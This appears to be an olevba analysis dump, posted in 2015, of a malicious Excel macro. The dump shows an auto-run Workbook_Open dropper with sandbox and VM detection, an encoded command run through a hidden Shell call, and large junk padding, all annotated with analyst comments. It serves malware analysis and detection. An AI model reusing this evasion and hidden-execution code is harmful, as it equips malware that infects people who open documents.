dynamoo

Malicious Excel macro

Mar 11th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- Rem_8392TN.xml
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Rem_8392TN.xml
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ЭтаКнига.cls
  13. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
      ' Excel auto-exec event handler: runs when the workbook is opened with macros enabled.
      ' The only statement with an effect is the call on the next line. jhVKdsfjsd is the
      ' Sub in load.bas (same dump): it runs three environment checks, builds a string with
      ' MkSrpQP(<encoded text>, "rcVcHUTj") and passes the result to Shell with window
      ' style 0 (hidden window).
  16. jhVKdsfjsd
      ' Padding: each loop below runs exactly once with its counter at 0, so the "= 5"
      ' test is never true and End is never reached. Only the local counters are touched.
  17. Dim siNQQVbL As Integer
  18. For siNQQVbL = 0 To 0
  19. If siNQQVbL = 5 Then End
  20. Next siNQQVbL
  21. Dim gJLryR As Integer
  22. For gJLryR = 0 To 0
  23. If gJLryR = 5 Then End
  24. Next gJLryR
  25. Dim wVKHBTQ As Integer
  26. For wVKHBTQ = 0 To 0
  27. If wVKHBTQ = 5 Then End
  28. Next wVKHBTQ
  29. End Sub
  30.  
  31.  
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. ANALYSIS:
  34. +----------+---------------+----------------------------------------+
  35. | Type     | Keyword       | Description                            |
  36. +----------+---------------+----------------------------------------+
  37. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  38. +----------+---------------+----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Лист1.cls
  41. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Лист2.cls
  46. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Лист3.cls
  51. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53. (empty macro)
  54. -------------------------------------------------------------------------------
  55. VBA MACRO Class1.cls
  56. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  57. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  58.  
  59. Private Function nxNZiOiHENlXPUXVbjKuvaMDRZpscgBqooOqJ()
      ' Padding routine: no call to it appears in the modules shown, and it returns nothing.
      ' The loop counts a local from 8 to 30, calling DoEvents each pass; the two string
      ' comparisons are between different literals, so neither End is ever reached.
  60.  
  61. Dim vowYxIwMEb As Integer
  62. vowYxIwMEb = 8:
  63. Do While vowYxIwMEb < 30
  64.    DoEvents: vowYxIwMEb = vowYxIwMEb + 1
  65. Loop
  66.  
  67. If "dJaAtNalSZ" = "QyrtgazWfE" Then End
  68.  
  69. If "AmpntVcNOs" = "xVjrBLurmC" Then End
  70.  
  71. End Function
  72.  
  73. Private Function wwWyRnRgNmuWxtGnKCTUesVCHrYSLyKjXOwpr()
      ' Padding routine: two always-false literal comparisons, then a GoTo whose target
      ' label is the very next line (a no-op jump).
  74.  
  75. If "nMxiuRPuDk" = "vPUfDSsJTW" Then End
  76.  
  77. If "ukPPoRcGjy" = "FeNoQMyGCu" Then End
  78.  
  79. GoTo mwLNUsKqdd
  80. mwLNUsKqdd:
  81.  
  82. End Function
  83.  
  84. Private Sub HLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsigg()
      ' Padding routine: two no-op GoTo/label pairs, then a numeric string assigned to a
      ' Long local that is never read. The trailing ":" is an empty statement separator.
  85.  
  86. GoTo rAnNVQrNAd
  87. rAnNVQrNAd:
  88.  
  89. GoTo tnYTovaSSl
  90. tnYTovaSSl:
  91.  
  92. Dim ZdjYhXjSys As Long
  93. ZdjYhXjSys = "2076":
  94.  
  95. End Sub
  96.  
  97. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  98. ANALYSIS:
  99. No suspicious keyword or IOC found.
  100. -------------------------------------------------------------------------------
  101. VBA MACRO Class2.cls
  102. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104.  
  105. Public Function jXOwprFSxuEcnYkHFkTBlFKvTIJyJMQkaFfeH()
  106.  
  107. GoTo XdDLNoKwea
  108. XdDLNoKwea:
  109.  
  110. Dim jLVjlsRIPb As Integer
  111. jLVjlsRIPb = 7:
  112. Do While jLVjlsRIPb < 16
  113.    DoEvents: jLVjlsRIPb = jLVjlsRIPb + 1
  114. Loop
  115.  
  116. Dim AOYnziviOL As Integer
  117. AOYnziviOL = 0:
  118. Do While AOYnziviOL < 11
  119.    DoEvents: AOYnziviOL = AOYnziviOL + 1
  120. Loop
  121.  
  122. GoTo PuxvbKRVva
  123. PuxvbKRVva:
  124.  
  125. If "zpTcgBRoPO" = "qJmQylltop" Then End
  126.  
  127. Dim mCBSMwrNUZ As Integer
  128. mCBSMwrNUZ = 8:
  129. Do While mCBSMwrNUZ < 26
  130.    DoEvents: mCBSMwrNUZ = mCBSMwrNUZ + 1
  131. Loop
  132.  
  133. GoTo KxCIWGvhqw
  134. KxCIWGvhqw:
  135.  
  136. GoTo mvUfxcfdjS
  137. mvUfxcfdjS:
  138.  
  139. Dim DEiuLQYBko As Integer
  140. DEiuLQYBko = 4:
  141. Do While DEiuLQYBko < 12
  142.    DoEvents: DEiuLQYBko = DEiuLQYBko + 1
  143. Loop
  144.  
  145. End Function
  146.  
  147. Public Sub ooOqJfJYlemOplxmCtrMWrNtyQQKDqCIPGohj()
  148.  
  149. GoTo uEcnyLOMrt
  150. uEcnyLOMrt:
  151.  
  152. Dim lMRWTIQZJT As Long
  153. lMRWTIQZJT = "4654":
  154.  
  155. Dim FfeHzWnvVD As Long
  156. FfeHzWnvVD = "146":
  157.  
  158. If "CoWskbcNBd" = "kpAgatHsrf" Then End
  159.  
  160. If "FYANaGDMkW" = "HTPNTbJtnS" Then End
  161.  
  162. Dim QRhrUYTJnn As Long
  163. QRhrUYTJnn = "8655":
  164.  
  165. If "EIXdDLNoKw" = "easjLVjlsR" Then End
  166.  
  167. If "PbbptAOYnz" = "iviOLUMXPu" Then End
  168.  
  169. GoTo bKRVvamjyz
  170. bKRVvamjyz:
  171.  
  172. End Sub
  173.  
  174. Private Sub hkUYsiggGIBEIQdDLGhdpetsjEOJelqIIbCPt()
  175.  
  176. Dim vhqwqpmvUf As Integer
  177. vhqwqpmvUf = 9:
  178. Do While vhqwqpmvUf < 14
  179.    DoEvents: vhqwqpmvUf = vhqwqpmvUf + 1
  180. Loop
  181.  
  182. GoTo jSsDEiuLQY
  183. jSsDEiuLQY:
  184.  
  185. Dim ojZXXwZrOr As Long
  186. ojZXXwZrOr = "4269":
  187.  
  188. GoTo uwYUgVKCAu
  189. uwYUgVKCAu:
  190.  
  191. Dim AVChyySlZK As Integer
  192. AVChyySlZK = 6:
  193. Do While AVChyySlZK < 28
  194.    DoEvents: AVChyySlZK = AVChyySlZK + 1
  195. Loop
  196.  
  197. Dim XQSFZxuEcn As Integer
  198. XQSFZxuEcn = 10:
  199. Do While XQSFZxuEcn < 30
  200.    DoEvents: XQSFZxuEcn = XQSFZxuEcn + 1
  201. Loop
  202.  
  203. Dim MrtalMRWTI As Integer
  204. MrtalMRWTI = 7:
  205. Do While MrtalMRWTI < 3
  206.    DoEvents: MrtalMRWTI = MrtalMRWTI + 1
  207. Loop
  208.  
  209. GoTo TQkaFfeHzW
  210. TQkaFfeHzW:
  211.  
  212. Dim vVDFGCoWsk As Long
  213. vVDFGCoWsk = "5896":
  214.  
  215. End Sub
  216.  
  217. Private Sub UesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKvT()
  218.  
  219. Dim UYTJnnmPBE As Integer
  220. UYTJnnmPBE = 3:
  221. Do While UYTJnnmPBE < 2
  222.    DoEvents: UYTJnnmPBE = UYTJnnmPBE + 1
  223. Loop
  224.  
  225. Dim DLNoKweasj As Integer
  226. DLNoKweasj = 10:
  227. Do While DLNoKweasj < 6
  228.    DoEvents: DLNoKweasj = DLNoKweasj + 1
  229. Loop
  230.  
  231. GoTo sRIPbbptAO
  232. sRIPbbptAO:
  233.  
  234. Dim nziviOLUMX As Integer
  235. nziviOLUMX = 8:
  236. Do While nziviOLUMX < 27
  237.    DoEvents: nziviOLUMX = nziviOLUMX + 1
  238. Loop
  239.  
  240. GoTo vbKRVvamjy
  241. vbKRVvamjy:
  242.  
  243. Dim pTcgBRoPOq As Integer
  244. pTcgBRoPOq = 8:
  245. Do While pTcgBRoPOq < 15
  246.    DoEvents: pTcgBRoPOq = pTcgBRoPOq + 1
  247. Loop
  248.  
  249. Dim ylltoplYmC As Integer
  250. ylltoplYmC = 6:
  251. Do While ylltoplYmC < 11
  252.    DoEvents: ylltoplYmC = ylltoplYmC + 1
  253. Loop
  254.  
  255. GoTo wrNUZqqKKx
  256. wrNUZqqKKx:
  257.  
  258. GoTo IWGvhqwqpm
  259. IWGvhqwqpm:
  260.  
  261. End Sub
  262.  
  263. Private Sub NlXPUXVbjKuvaMDRZpscgBqooOqJfJYlemOpl()
  264.  
  265. GoTo CAueAVChyy
  266. CAueAVChyy:
  267.  
  268. GoTo KqxOXQSFZx
  269. KqxOXQSFZx:
  270.  
  271. Dim EcnyLOMrta As Long
  272. EcnyLOMrta = "272":
  273.  
  274. Dim RWTIQZJTQk As Integer
  275. RWTIQZJTQk = 5:
  276. Do While RWTIQZJTQk < 19
  277.    DoEvents: RWTIQZJTQk = RWTIQZJTQk + 1
  278. Loop
  279.  
  280. Dim zWnvVDFGCo As Long
  281. zWnvVDFGCo = "5900":
  282.  
  283. Dim kbcNBdkpAg As Long
  284. kbcNBdkpAg = "1401":
  285.  
  286. If "HsrfwFYANa" = "GDMkWHTPNT" Then End
  287.  
  288. If "JtnSEbQRhr" = "UYTJnnmPBE" Then End
  289.  
  290. GoTo sjLVjlsRIP
  291. sjLVjlsRIP:
  292.  
  293. End Sub
  294.  
  295. Private Function TTHLrfpFRANaGDMdPHMPNTbJmnSEbQRhkUYsi()
  296.  
  297. Dim lYmCBSMwrN As Long
  298. lYmCBSMwrN = "4520":
  299.  
  300. Dim qqKKxCIWGv As Long
  301. qqKKxCIWGv = "2028":
  302.  
  303. If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
  304.  
  305. Dim BkojZXXwZr As Long
  306. BkojZXXwZr = "3274":
  307.  
  308. Dim muwYUgVKCA As Integer
  309. muwYUgVKCA = 2:
  310. Do While muwYUgVKCA < 9
  311.    DoEvents: muwYUgVKCA = muwYUgVKCA + 1
  312. Loop
  313.  
  314. Dim VChyySlZKq As Integer
  315. VChyySlZKq = 6:
  316. Do While VChyySlZKq < 16
  317.    DoEvents: VChyySlZKq = VChyySlZKq + 1
  318. Loop
  319.  
  320. GoTo QSFZxuEcny
  321. QSFZxuEcny:
  322.  
  323. If "rtalMRWTIQ" = "ZJTQkaFfeH" Then End
  324.  
  325. Dim nvVDFGCoWs As Long
  326. nvVDFGCoWs = "8149":
  327.  
  328. End Function
  329.  
  330. Private Function TUesVCHrYSLyKjXOwprFSxuEcnYkHFkTBlFKv()
  331.  
  332. If "hrUYTJnnmP" = "BEIXdDLNoK" Then End
  333.  
  334. GoTo IPbbptAOYn
  335. IPbbptAOYn:
  336.  
  337. Dim iOLUMXPuxv As Long
  338. iOLUMXPuxv = "4273":
  339.  
  340. Dim RVvamjyzpT As Integer
  341. RVvamjyzpT = 8:
  342. Do While RVvamjyzpT < 9
  343.    DoEvents: RVvamjyzpT = RVvamjyzpT + 1
  344. Loop
  345.  
  346. If "RoPOqJmQyl" = "ltoplYmCBS" Then End
  347.  
  348. If "rNUZqqKKxC" = "IWGvhqwqpm" Then End
  349.  
  350. If "UfxcfdjSsD" = "EiuLQYBkoj" Then End
  351.  
  352. If "XXwZrOrgUm" = "uwYUgVKCAu" Then End
  353.  
  354. Dim qxOXQSFZxu As Integer
  355. qxOXQSFZxu = 8:
  356. Do While qxOXQSFZxu < 8
  357.    DoEvents: qxOXQSFZxu = qxOXQSFZxu + 1
  358. Loop
  359.  
  360. End Function
  361.  
  362. Private Sub fQcfdjLSDEinLzhqBkhcSwwWyRnRgNmuWxtGn()
  363.  
  364. GoTo cNBdkpAgat
  365. cNBdkpAgat:
  366.  
  367. GoTo srfwFYANaG
  368. srfwFYANaG:
  369.  
  370. Dim MkWHTPNTbJ As Long
  371. MkWHTPNTbJ = "1275":
  372.  
  373. Dim SEbQRhrUYT As Long
  374. SEbQRhrUYT = "5649":
  375.  
  376. Dim mPBEIXdDLN As Integer
  377. mPBEIXdDLN = 1:
  378. Do While mPBEIXdDLN < 9
  379.    DoEvents: mPBEIXdDLN = mPBEIXdDLN + 1
  380. Loop
  381.  
  382. If "easjLVjlsR" = "IPbbptAOYn" Then End
  383.  
  384. Dim JmQylltopl As Long
  385. JmQylltopl = "895":
  386.  
  387. Dim BSMwrNUZqq As Long
  388. BSMwrNUZqq = "9270":
  389.  
  390. If "xCIWGvhqwq" = "pmvUfxcfdj" Then End
  391.  
  392. End Sub
  393.  
  394. Private Sub jKuvaMDRZpscgBqooOqJfJYlemOplxmCtrMWr()
  395.  
  396. GoTo yySlZKqxOX
  397. yySlZKqxOX:
  398.  
  399. Dim SFZxuEcnyL As Integer
  400. SFZxuEcnyL = 2:
  401. Do While SFZxuEcnyL < 15
  402.    DoEvents: SFZxuEcnyL = SFZxuEcnyL + 1
  403. Loop
  404.  
  405. GoTo talMRWTIQZ
  406. talMRWTIQZ:
  407.  
  408. Dim atHsrfwFYA As Integer
  409. atHsrfwFYA = 3:
  410. Do While atHsrfwFYA < 9
  411.    DoEvents: atHsrfwFYA = atHsrfwFYA + 1
  412. Loop
  413.  
  414. GoTo tnSEbQRhrU
  415. tnSEbQRhrU:
  416.  
  417. Dim JnnmPBEIXd As Long
  418. JnnmPBEIXd = "7522":
  419.  
  420. Dim NoKweasjLV As Long
  421. NoKweasjLV = "4528":
  422.  
  423. Dim YnziviOLUM As Integer
  424. YnziviOLUM = 10:
  425. Do While YnziviOLUM < 1
  426.    DoEvents: YnziviOLUM = YnziviOLUM + 1
  427. Loop
  428.  
  429. Dim xvbKRVvamj As Integer
  430. xvbKRVvamj = 6:
  431. Do While xvbKRVvamj < 3
  432.    DoEvents: xvbKRVvamj = xvbKRVvamj + 1
  433. Loop
  434.  
  435. End Sub
  436.  
  437. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  438. ANALYSIS:
  439. No suspicious keyword or IOC found.
  440. -------------------------------------------------------------------------------
  441. VBA MACRO Class3.cls
  442. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  443. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  444.  
  445. Private Function bJmnSEbQRhkUYsiggGIBEIQdDLGhdpetsjEOJ()
  446.  
  447. Dim qqKKxCIWGv As Long
  448. qqKKxCIWGv = "2028":
  449.  
  450. If "wqpmvUfxcf" = "djSsDEiuLQ" Then End
  451.  
  452. Dim BkojZXXwZr As Long
  453. BkojZXXwZr = "3274":
  454.  
  455. Dim muwYUgVKCA As Integer
  456. muwYUgVKCA = 2:
  457. Do While muwYUgVKCA < 9
  458.    DoEvents: muwYUgVKCA = muwYUgVKCA + 1
  459. Loop
  460.  
  461. End Function
  462.  
  463. Public Sub rNtyQQKDqCIPGohjwqPMVtfQcfdjLSDEinLzh()
  464.  
  465. GoTo QkaFfeHzWn
  466. QkaFfeHzWn:
  467.  
  468. Dim VDFGCoWskb As Long
  469. VDFGCoWskb = "8643":
  470.  
  471. If "BdkpAgatHs" = "rfwFYANaGD" Then End
  472.  
  473. Dim kWHTPNTbJt As Integer
  474. kWHTPNTbJt = 1:
  475. Do While kWHTPNTbJt < 22
  476.    DoEvents: kWHTPNTbJt = kWHTPNTbJt + 1
  477. Loop
  478.  
  479. End Sub
  480.  
  481. Private Function vTIJyJMQkaFfeHsvZoVuDFGCovSkbcmBdKiAg()
  482.  
  483. Dim tAOYnziviO As Integer
  484. tAOYnziviO = 6:
  485. Do While tAOYnziviO < 21
  486.    DoEvents: tAOYnziviO = tAOYnziviO + 1
  487. Loop
  488.  
  489. Dim XPuxvbKRVv As Long
  490. XPuxvbKRVv = "3023":
  491.  
  492. If "jyzpTcgBRo" = "POqJmQyllt" Then End
  493.  
  494. GoTo plYmCBSMwr
  495. plYmCBSMwr:
  496.  
  497. End Function
  498.  
  499. Private Sub elqIIbCPtznxNZiOiHENlXPUXVbjKuvaMDRZp()
  500.  
  501. Dim jZXXwZrOrg As Integer
  502. jZXXwZrOrg = 4:
  503. Do While jZXXwZrOrg < 26
  504.    DoEvents: jZXXwZrOrg = jZXXwZrOrg + 1
  505. Loop
  506.  
  507. Dim wYUgVKCAue As Integer
  508. wYUgVKCAue = 3:
  509. Do While wYUgVKCAue < 27
  510.    DoEvents: wYUgVKCAue = wYUgVKCAue + 1
  511. Loop
  512.  
  513. If "hyySlZKqxO" = "XQSFZxuEcn" Then End
  514.  
  515. Dim LOMrtalMRW As Integer
  516. LOMrtalMRW = 4:
  517. Do While LOMrtalMRW < 20
  518.    DoEvents: LOMrtalMRW = LOMrtalMRW + 1
  519. Loop
  520.  
  521. End Sub
  522.  
  523. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  524. ANALYSIS:
  525. No suspicious keyword or IOC found.
  526. -------------------------------------------------------------------------------
  527. VBA MACRO Class4.cls
  528. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  529. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  530.  
  531. Private Sub uEcnYkHFkTBlFKvTIJyJMQkaFfeHsvZoVuDFG()
       ' Padding routine: counts a local from 2 to 19, calling DoEvents on each pass.
       ' It touches nothing outside that local, and no call to it appears in the modules shown.
  532.  
  533. Dim CuLmwLNUsK As Integer
  534. CuLmwLNUsK = 2:
  535. Do While CuLmwLNUsK < 19
  536.    DoEvents: CuLmwLNUsK = CuLmwLNUsK + 1
  537. Loop
  538.  
  539. End Sub
  540.  
  541. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  542. ANALYSIS:
  543. No suspicious keyword or IOC found.
  544. -------------------------------------------------------------------------------
  545. VBA MACRO Class5.cls
  546. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  547. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  548.  
  549. Public Function xmCtrMWrNtyQQKDqCIPGohjwqPMVtfQcfdjLS()
       ' Padding routine: counts a local from 9 to 24, calling DoEvents on each pass.
       ' The function name is never assigned, so it returns no meaningful value, and no
       ' call to it appears in the modules shown.
  550.  
  551. Dim xVjrBLurmC As Integer
  552. xVjrBLurmC = 9:
  553. Do While xVjrBLurmC < 24
  554.    DoEvents: xVjrBLurmC = xVjrBLurmC + 1
  555. Loop
  556.  
  557. End Function
  558.  
  559. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  560. ANALYSIS:
  561. No suspicious keyword or IOC found.
  562. -------------------------------------------------------------------------------
  563. VBA MACRO dfsdf.bas
  564. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfsdf'
  565. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  566.  
  567.  
  568.  Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
        ' The three Declare lines import the ANSI registry APIs from advapi32 (this is what
        ' olevba reports as "Lib"). In this module they are called only by IsVirtualPCPresent.
  569.  Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
  570.  Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long
        ' Declared but not referenced in the code shown: the function below passes the
        ' literal &H80000002 (the same value) instead of this constant.
  571.  Const HKEY_LOCAL_MACHINE = &H80000002
  572.  
  573.  Public Function IsVirtualPCPresent() As Long
        ' Anti-analysis check: reads value "0" under
        ' HKLM\SYSTEM\ControlSet001\Services\Disk\Enum (typically the first disk's device
        ' identifier string - confirm on the analysis host) and looks for hypervisor names.
        ' Returns 0 when the key or value cannot be read or nothing matches, 1 for *VIRTUAL*,
        ' 2 for *VMWARE*; the *VBOX* branch terminates the macro instead of returning.
        ' Detection note: an Office process reading this key is a useful behavioural
        ' indicator for this family of macro.
        ' Triage note: the caller in load.bas tests "IsVirtualPCPresent = True". True is -1
        ' in VBA and this function only returns 0, 1 or 2, so that test never fires; do not
        ' assume the sample stays dormant on hosts matching *VIRTUAL* or *VMWARE*.
  574.  Dim lhKey As Long
  575.  Dim sBuffer As String
  576.  Dim lLen As Long
        ' &H80000002 is HKEY_LOCAL_MACHINE; &H20019 is the KEY_READ access mask.
  577.  If RegOpenKeyEx(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", _
  578.  0, &H20019, lhKey) = 0 Then
        ' Pre-size a 255-character buffer for the ANSI API to fill; lLen receives the length.
  579.  sBuffer = Space$(255): lLen = 255
  580.  If RegQueryValueEx(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
        ' Keep lLen - 1 characters (presumably dropping the terminating NUL) and upper-case
        ' them so the Like patterns below are effectively case-insensitive.
  581.  sBuffer = UCase(Left$(sBuffer, lLen - 1))
        ' "Select Case True" runs the first Case whose expression evaluates to True.
  582.  Select Case True
  583.  Case sBuffer Like "*VIRTUAL*": IsVirtualPCPresent = 1
  584.  Case sBuffer Like "*VMWARE*": IsVirtualPCPresent = 2
  585.  Case sBuffer Like "*VBOX*": IsVirtualPCPresent = 3
        ' The next line belongs to the *VBOX* Case only. "x = 1 Or 2 Or 3" parses as
        ' "(x = 1) Or 2 Or 3", which is non-zero for every x, so End always runs here and
        ' RegCloseKey is not reached on this path.
  586.  If IsVirtualPCPresent = 1 Or 2 Or 3 Then End
  587.  End Select
  588.  End If
  589.  Call RegCloseKey(lhKey)
  590.  End If
  591.  End Function
  592. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  593. ANALYSIS:
  594. +------------+----------------+-----------------------------------------+
  595. | Type       | Keyword        | Description                             |
  596. +------------+----------------+-----------------------------------------+
  597. | Suspicious | Lib            | May run code from a DLL                 |
  598. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  599. |            |                | be used to obfuscate strings (option    |
  600. |            |                | --decode to see all)                    |
  601. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  602. |            |                | may be used to obfuscate strings        |
  603. |            |                | (option --decode to see all)            |
  604. +------------+----------------+-----------------------------------------+
  605. -------------------------------------------------------------------------------
  606. VBA MACRO load.bas
  607. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/load'
  608. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  609.  Sub jhVKdsfjsd()
  610.     If IsSandBoxiePresent(1) = True Then End
  611.     If IsAnubisPresent(1) = True Then End
  612.     If IsVirtualPCPresent = True Then End
  613. oPOJidsf = MkSrpQP("Õкƒw tºÒÍȺ¨¼×Ï‘­Í¹’‹¤È¿‚£ÔͻƼu§ëÖÊȵƒ¢×ׄº­·—Þ̻Ѽ~‚¶ÒÍѴĵ֩¿Ï­}{Ú×ÊÓ‚„ƒ«–„”…‚£•‰‘{‹ƒÓÖºÙÀ„ºÙËÉ‘¸½Ä™}ˆœš¡Âˆ²Ç»»ÇÖ©œ©¾ƒ·ÓÅ}Œƒu¹êӷѬuyƨ£³m±¸åÉÉÇŽ›šè‘¹Äªuyƨ£³m±¸åÉÉÇŽ›šè‘»Û­tå×·Õ¼uyƨ£³m±¸åÉÉÇŽ›šè‘»Û­", "rcVcHUTj")
  614. Dim wfSoeUjt As Integer
  615. For wfSoeUjt = 0 To 0
  616. If wfSoeUjt = 5 Then End
  617. Next wfSoeUjt
  618. Dim tNhbQ As Integer
  619. For tNhbQ = 0 To 0
  620. If tNhbQ = 5 Then End
  621. Next tNhbQ
  622. Shell oPOJidsf, 0
  623. Dim stahzHxdYZQ As Integer
  624. For stahzHxdYZQ = 0 To 0
  625. If stahzHxdYZQ = 5 Then End
  626. Next stahzHxdYZQ
  627.     End Sub
  628.  
  629. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  630. ANALYSIS:
  631. +------------+----------------+-----------------------------------------+
  632. | Type       | Keyword        | Description                             |
  633. +------------+----------------+-----------------------------------------+
  634. | Suspicious | Shell          | May run an executable file or a system  |
  635. |            |                | command                                 |
  636. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  637. |            |                | may be used to obfuscate strings        |
  638. |            |                | (option --decode to see all)            |
  639. +------------+----------------+-----------------------------------------+
  640. -------------------------------------------------------------------------------
  641. VBA MACRO Module1.bas
  642. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  643. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  644. Private Sub gbwEJaatNBMSZQyrtgBZWfEpampntVcNOsxVj()
  645.  
  646. Dim VpfKKjMeBe As Long
  647. VpfKKjMeBe = "4141":
  648.  
  649. If "ojLHtBXPGh" = "rGIPuFlFyM" Then End
  650.  
  651. Dim kBKDFSFkhR As Long
  652. kBKDFSFkhR = "6144":
  653.  
  654. Dim lYUSYgnysX As Integer
  655. lYUSYgnysX = 9:
  656. Do While lYUSYgnysX < 19
  657.    DoEvents: lYUSYgnysX = lYUSYgnysX + 1
  658. Loop
  659.  
  660. If "WMWZDxnSsr" = "UfJmCiIQST" Then End
  661.  
  662. GoTo bJfxopAOqx
  663. bJfxopAOqx:
  664.  
  665. End Sub
  666.  
  667. Public Sub sKqddRVCpzPbKXkQNWnyqWZXDlTwxcOlabrue()
  668.  
  669. If "ttTvORVDqQ" = "YTuqDrgfwR" Then End
  670.  
  671. If "wryEVVoocg" = "NBLamvbvUR" Then End
  672.  
  673. Dim ZKChkioXxI As Long
  674. ZKChkioXxI = "7641":
  675.  
  676. If "zQemcGptOE" = "bCBdWsWlyr" Then End
  677.  
  678. Dim bcyLlHFZje As Long
  679. bcyLlHFZje = "1896":
  680.  
  681. Dim MddXQdPVcT As Long
  682. MddXQdPVcT = "6018":
  683.  
  684. End Sub
  685.  
  686. Public Function rtgBZWfEpampntVcNOsxVjrBLurmcHHgJbxbq()
  687.  
  688. Dim jLHtBXPGhr As Long
  689. jLHtBXPGhr = "2393":
  690.  
  691. Dim PuFlFyMXwk As Long
  692. PuFlFyMXwk = "6265":
  693.  
  694. GoTo DFSFkhRpal
  695. DFSFkhRpal:
  696.  
  697. If "SYgnysXJGV" = "WMWZDxnSsr" Then End
  698.  
  699. Dim JmCiIQSTPb As Long
  700. JmCiIQSTPb = "5772":
  701.  
  702. If "pAOqxvNtgg" = "UyescSENAn" Then End
  703.  
  704. End Function
  705.  
  706. Private Function QNWnyqWZXDlTwxcOlabrueiDsqqpSLOranNVQ()
  707.  
  708. Dim rgfwRBwryE As Integer
  709. rgfwRBwryE = 7:
  710. Do While rgfwRBwryE < 27
  711.    DoEvents: rgfwRBwryE = rgfwRBwryE + 1
  712. Loop
  713.  
  714. GoTo cgNBLamvbv
  715. cgNBLamvbv:
  716.  
  717. Dim RaZKChkioX As Long
  718. RaZKChkioX = "7273":
  719.  
  720. If "inzQemcGpt" = "OEbCBdWsWl" Then End
  721.  
  722. GoTo rzbcyLlHFZ
  723. rzbcyLlHFZ:
  724.  
  725. Dim eAHMddXQdP As Integer
  726. eAHMddXQdP = 5:
  727. Do While eAHMddXQdP < 29
  728.    DoEvents: eAHMddXQdP = eAHMddXQdP + 1
  729. Loop
  730.  
  731. End Function
  732.  
  733. Public Function QyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJbx()
  734.  
  735. Dim XwkBKDFSFk As Integer
  736. XwkBKDFSFk = 4:
  737. Do While XwkBKDFSFk < 6
  738.    DoEvents: XwkBKDFSFk = XwkBKDFSFk + 1
  739. Loop
  740.  
  741. Dim alYUSYgnys As Long
  742. alYUSYgnys = "888":
  743.  
  744. If "VWMWZDxnSs" = "rUfJmCiIQS" Then End
  745.  
  746. GoTo vNtggUyesc
  747. vNtggUyesc:
  748.  
  749. Dim ENAnTQZqCU As Long
